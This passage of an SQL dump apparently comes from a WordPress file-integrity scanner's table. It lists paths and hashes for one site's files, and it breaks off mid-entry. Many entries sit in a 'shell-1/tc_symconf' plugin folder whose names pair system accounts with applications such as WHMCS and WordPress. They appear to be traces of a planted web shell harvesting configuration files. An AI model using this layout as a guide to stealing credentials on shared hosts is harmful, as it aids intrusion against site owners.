t\\/plugins\\/shell-1\\/tc_symconf\\/norfaiz-IPB.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/mailnull-MyBB.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/mail-Hostbills.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/rpc-MyBB.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/cpaneleximfilter-Hostbills.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/postfix-^WHMCS.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/root-WHMCS.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/nscd-Zencart.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/sync-BoxBilling.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/cpaneleximfilter-Joomla.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/-Hostbills.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/nscd-OsCommerce.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/nobody-Zencart.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/daemon-Vbulletin.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/sshd-Zencart.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/postfix-Zencart.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/bin-WHMCS.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/dovecot-IPB.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/named-Vbulletin.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/norfaiz-^WHMCS.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/nobody-MyBB.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/-IPB.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/-Wordpress.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/sshd-Wordpress.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/cpaneleximfilter-Vbulletin.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/root-BoxBilling.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/bin-Zencart.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/sync-Zencart.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/vcsa-Zencart.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/cpaneleximfilter-^WHMCS.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/named-Zencart.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/sync-Vbulletin.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/mysql-^WHMCS.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/dbus-Vbulletin.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/daemon-OsCommerce.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/daemon-Joomla.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/ftp-Joomla.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/haldaemon-Wordpress.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/rpc-IPB.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/mailman-Vbulletin.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/daemon-Zencart.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/postfix-IPB.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/dbus-^WHMCS.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/named-BoxBilling.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/postfix-Wordpress.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/mail-OsCommerce.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/cpaneleximfilter-IPB.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/dbus-MyBB.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/mail-^WHMCS.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/vcsa-MyBB.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/rpc-OsCommerce.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/postfix-OsCommerce.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/mysql-OsCommerce.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/vcsa-Joomla.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/norfaiz-Hostbills.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/sync-MyBB.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/sshd-Vbulletin.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/named-Wordpress.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/mailman-WHMCS.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/daemon-BoxBilling.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/nscd-BoxBilling.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/cpaneleximfilter-WHMCS.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/-BoxBilling.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/nscd-MyBB.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/haldaemon-OsCommerce.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/bin-Hostbills.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/root-Zencart.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/root-Wordpress.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/rpcuser-MyBB.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/vcsa-Hostbills.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/mysql-Hostbills.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/mailnull-BoxBilling.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/rpc-^WHMCS.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/rpc-Joomla.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/norfaiz-Vbulletin.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/ftp-OsCommerce.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/ftp-IPB.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/nobody-^WHMCS.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/sshd-^WHMCS.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/haldaemon-Zencart.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/sync-OsCommerce.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/dovecot-BoxBilling.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/postfix-WHMCS.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/mailnull-Wordpress.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/mailnull-^WHMCS.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/sshd-Joomla.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/sshd-IPB.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/rpcuser-^WHMCS.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/mailman-IPB.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/cpaneleximfilter-OsCommerce.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/dovecot-Vbulletin.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/cpaneleximfilter-MyBB.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/bin-Joomla.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/sshd-WHMCS.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/dbus-Wordpress.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/mail-IPB.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/cpaneleximfilter-BoxBilling.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/nscd-Vbulletin.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/bin-Vbulletin.txt\":{\"d\":false,\"h\":false}}','2019-01-10 03:50:35'),(30,'file-list','',0,'a:1:{s:4:\"home\";s:41:\"/home/norfaiz/public_html/bintara.com.my/\";}','2019-01-10 03:50:35'),(31,'file-list','files',0,'{\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/user\\/privacy.php\":{\"d\":1509983274,\"h\":\"27ddd7bc6e0da6fac87f279bff299bb3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/user\\/profile.php\":{\"d\":1415109742,\"h\":\"b9fa17a9811195800079dda4b1262d03\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/user\\/credits.php\":{\"d\":1380059292,\"h\":\"d920b4fb1be2c2c780081d5b4b7de55a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/user\\/admin.php\":{\"d\":1463931090,\"h\":\"702d5220c70456456fe9fc8cc08cc524\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/user\\/index.php\":{\"d\":1415109742,\"h\":\"c8fd98f7fdd52d78bdadf74e620789fa\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/user\\/freedoms.php\":{\"d\":1380059292,\"h\":\"1ba6cbb9e2a9d3deb348997492ed692e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/user\\/about.php\":{\"d\":1380059292,\"h\":\"99ec00da8d914b4efd2098a3e44ebe2d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/user\\/menu.php\":{\"d\":1399354096,\"h\":\"a529e3d3c2bb86671fb9cc1145cf70ee\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/user\\/user-edit.php\":{\"d\":1415109742,\"h\":\"2a7a75a363b0f88f0b6d094a91ef65ea\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/maint\\/repair.php\":{\"d\":1467628830,\"h\":\"e180a3bb17b896e1cdccf337995bfe2f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/network\\/privacy.php\":{\"d\":1509983274,\"h\":\"1cd56b9e7e7b5b60506e17c13efc194f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/network\\/sites.php\":{\"d\":1501611284,\"h\":\"f47c7119bb162319e5b08198f289465a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/network\\/profile.php\":{\"d\":1474981770,\"h\":\"6874157fda181bc2866fd860d93376b9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/network\\/credits.php\":{\"d\":1474981770,\"h\":\"a1be54253e72acd96ce6317127e5a5c0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/network\\/admin.php\":{\"d\":1474981770,\"h\":\"48f1fe3370f9d713b027655b6785e694\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/network\\/theme-install.php\":{\"d\":1474981770,\"h\":\"629704e41fc670178a4226b323b6a9ec\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/network\\/site-info.php\":{\"d\":1500315826,\"h\":\"1d7a8639d300cee539ca9e666ef3a25d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/network\\/plugin-install.php\":{\"d\":1474981770,\"h\":\"132a6c9d6e2cc68d650e2fca9a015ed2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/network\\/plugins.php\":{\"d\":1474981770,\"h\":\"e4f7cdfcaddc4693fe0bcc39bb55d68a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/network\\/site-users.php\":{\"d\":1520545542,\"h\":\"6697a771a09bd04440a0adcb84cfaf1b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/network\\/update-core.php\":{\"d\":1474981770,\"h\":\"95b7d47ed7134912270f8d3059100e8c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/network\\/index.php\":{\"d\":1495109084,\"h\":\"54c0f4e71be5ff1b652a0e2ad364daee\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/network\\/upgrade.php\":{\"d\":1501611284,\"h\":\"a350dc0d0ddaccfd7ff462b63db83853\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/network\\/users.php\":{\"d\":1481300862,\"h\":\"c860fcfffc818a23600b90647fc8af61\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/network\\/edit.php\":{\"d\":1474981770,\"h\":\"94b2a24a1fc9883246fc103f22818930\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/network\\/setup.php\":{\"d\":1474981770,\"h\":\"ce74e43d24d9c36cd579e932ee94b152\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/network\\/plugin-editor.php\":{\"d\":1474981770,\"h\":\"658cf64b77d435555ae217a5bbb1536a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/network\\/site-settings.php\":{\"d\":1500315826,\"h\":\"381a1ad35327607137891a8fa6f97f63\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/network\\/update.php\":{\"d\":1474981770,\"h\":\"fca6110bd2f3fbd9f247540677fcf1ac\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/network\\/freedoms.php\":{\"d\":1474981770,\"h\":\"e1af39e94239a944440ab2925393ae60\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/network\\/themes.php\":{\"d\":1481300862,\"h\":\"c3171c1b8c9ce3069e398b5c1f2ac778\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/network\\/theme-editor.php\":{\"d\":1474981770,\"h\":\"5e1829bf1794ce06c5ad77b7e2d17142\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/network\\/site-new.php\":{\"d\":1516825778,\"h\":\"8baabd6743c1b12169366e8d59ae333f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/network\\/about.php\":{\"d\":1474981770,\"h\":\"36fd6671a5493cc8c5405621d96dea7c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/network\\/settings.php\":{\"d\":1516825778,\"h\":\"beb6c7cdcf1cf9a5d12df9232c6427f1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/network\\/menu.php\":{\"d\":1503130184,\"h\":\"483c257170948f11568f83784109b2d7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/network\\/user-edit.php\":{\"d\":1474981770,\"h\":\"030bb6ad3f1c614f7f1aa7fd27b79509\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/network\\/user-new.php\":{\"d\":1475555612,\"h\":\"df7a0edcb7994581430379db56d8d53b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/network\\/site-themes.php\":{\"d\":1500315826,\"h\":\"5db8234bc5ce96a4b029607222bc87fc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/colors\\/midnight\\/colors.css\":{\"d\":1508792690,\"h\":\"bd3be68c8212aeabe5af215df5e0d0cb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/colors\\/midnight\\/colors-rtl.min.css\":{\"d\":1508792690,\"h\":\"949cb3874d4150bf45d54d02f108bc1d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/colors\\/midnight\\/colors.min.css\":{\"d\":1508792690,\"h\":\"3c8eb91438052ad8ed3e5c407bb46871\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/colors\\/midnight\\/colors-rtl.css\":{\"d\":1508792690,\"h\":\"c4229460e28195d59dadc5927b591ef3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/colors\\/midnight\\/colors.scss\":{\"d\":1391658918,\"h\":\"26dc8daaf0c47c4457b8bc2145f48634\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/colors\\/sunrise\\/colors.css\":{\"d\":1508792690,\"h\":\"c3b594ce028a37cad08301b857e7dec7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/colors\\/sunrise\\/colors-rtl.min.css\":{\"d\":1508792690,\"h\":\"e21cc147dadf70a8ec27483f9663a088\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/colors\\/sunrise\\/colors.min.css\":{\"d\":1508792690,\"h\":\"4b919105096d441f974a99dc6bc9e243\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/colors\\/sunrise\\/colors-rtl.css\":{\"d\":1508792690,\"h\":\"64d732bae20f1bd9f1a39d28f479a35a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/colors\\/sunrise\\/colors.scss\":{\"d\":1391658918,\"h\":\"5692871a8a7a1914ee0968ddf9923dec\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/colors\\/ocean\\/colors.css\":{\"d\":1508792690,\"h\":\"7434d42be65938ef44ee3a474ccf72dd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/colors\\/ocean\\/colors-rtl.min.css\":{\"d\":1508792690,\"h\":\"ff093ff18aef2de35d910e9bc7300a63\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/colors\\/ocean\\/colors.min.css\":{\"d\":1508792690,\"h\":\"30f1caf5ac1ca40c859539bbf81e439e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/colors\\/ocean\\/colors-rtl.css\":{\"d\":1508792690,\"h\":\"9a55f6f39ed642323724a678c9cfa4b5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/colors\\/ocean\\/colors.scss\":{\"d\":1391658918,\"h\":\"1a7c5bfd9faf7f6cc77cd9b166062568\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/colors\\/light\\/colors.css\":{\"d\":1508792690,\"h\":\"2e105d8125f21fa58ebd346a11e9efcc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/colors\\/light\\/colors-rtl.min.css\":{\"d\":1539044566,\"h\":\"205693de99633c27a39d0c1783b792e3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/colors\\/light\\/colors.min.css\":{\"d\":1539044566,\"h\":\"12887d90070563f1d8df477f35e141b3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/colors\\/light\\/colors-rtl.css\":{\"d\":1508792690,\"h\":\"f1ee0df10cdc3a4308768472cc3e8667\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/colors\\/light\\/colors.scss\":{\"d\":1436982266,\"h\":\"480b9bd647e5b323ef88d63ce55e1d6f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-admin\\/css\\/colors\\/blue\\/colors.css\":{\"d\":1508792690,\"h\":\"f91d3fa65fded514fdc